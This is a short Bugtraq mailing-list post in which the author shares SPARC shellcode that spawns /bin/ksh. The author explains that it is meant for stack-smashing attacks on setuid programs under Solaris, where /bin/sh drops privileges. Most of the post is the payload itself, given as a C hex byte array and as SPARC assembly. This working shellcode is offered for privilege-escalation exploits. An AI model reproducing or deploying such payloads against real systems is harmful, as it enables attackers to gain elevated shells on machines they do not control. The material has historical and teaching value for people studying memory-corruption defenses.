/bin/ksh sparc code

[zomo () home serome co kr (Kichang Yang)]

 It seems that "smashin' the stack" attack (the term is borrowed from
Aleph1's article) is the hottest topic of bugtraq these days.
(except symlink-to-/.rhosts attack, of course.)

 If I remember correctly, the sparc code appeared on the bugtraq
is doing something like execl("/bin/sh","sh",0), and you know,
Solaris 2.4 /bin/sh does setuid(getuid()) unless "-p" isn't specified,
So it's kinda useless when it comes to attacking setuid'ed files.

 So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
I know it's no big deal, almost close to lame,  but I think it's kinda
useful. You'd like to check out Aleph1's article appeared (or will?)
on Phrack 49.

 I tested it on sun4d and I'm not sure it would work on other architecture.

Bye.

-- ksh.sparc.code.c
#define SPARC_NOP       0xac15a16e

char ksh_sparc_shellcode[] =
        "\x2d\x0b\xd8\x9a"
        "\xac\x15\xa1\x6e"
        "\x2f\x0b\xda\xdc"
        "\xae\x15\xe3\x68"
        "\x90\x0b\x80\x0e"
        "\x92\x03\xa0\x0c"
        "\x94\x1a\x80\x0a"
        "\x9c\x03\xa0\x14"
        "\xec\x3b\xbf\xec"
        "\xc0\x23\xbf\xf4"
        "\xdc\x23\xbf\xf8"
        "\xc0\x23\xbf\xfc"
        "\x82\x10\x20\x3b"
        "\x91\xd0\x20\x08"
        "\x90\x1b\xc0\x0f"
        "\x82\x10\x20\x01"
        "\x91\xd0\x20\x08";
-- ksh.sparc.s
.section ".data1"
.align 4
.L16:
.ascii "ksh.sparc.code goes\n\0"
.section ".text"
.global main
main:
save %sp, -96, %sp
set .L16,%o0
call printf,1
nop
        sethi   %hi(0x2f626800), %l6
        or      %l6, 0x16e, %l6
        sethi   %hi(0x2f6b7000), %l7
        or      %l7, 0x368, %l7
        and     %sp, %sp, %o0
        add     %sp, 12, %o1
        xor     %o2, %o2, %o2
        add     %sp, 20, %sp
        std     %l6, [%sp - 20]
        st      %g0, [%sp - 12]
        st      %sp, [%sp - 8]
        st      %g0, [%sp - 4]
        mov     0x3b, %g1
        ta      8
        xor     %o7, %o7, %o0
        mov     1, %g1
        ta      8
restore
--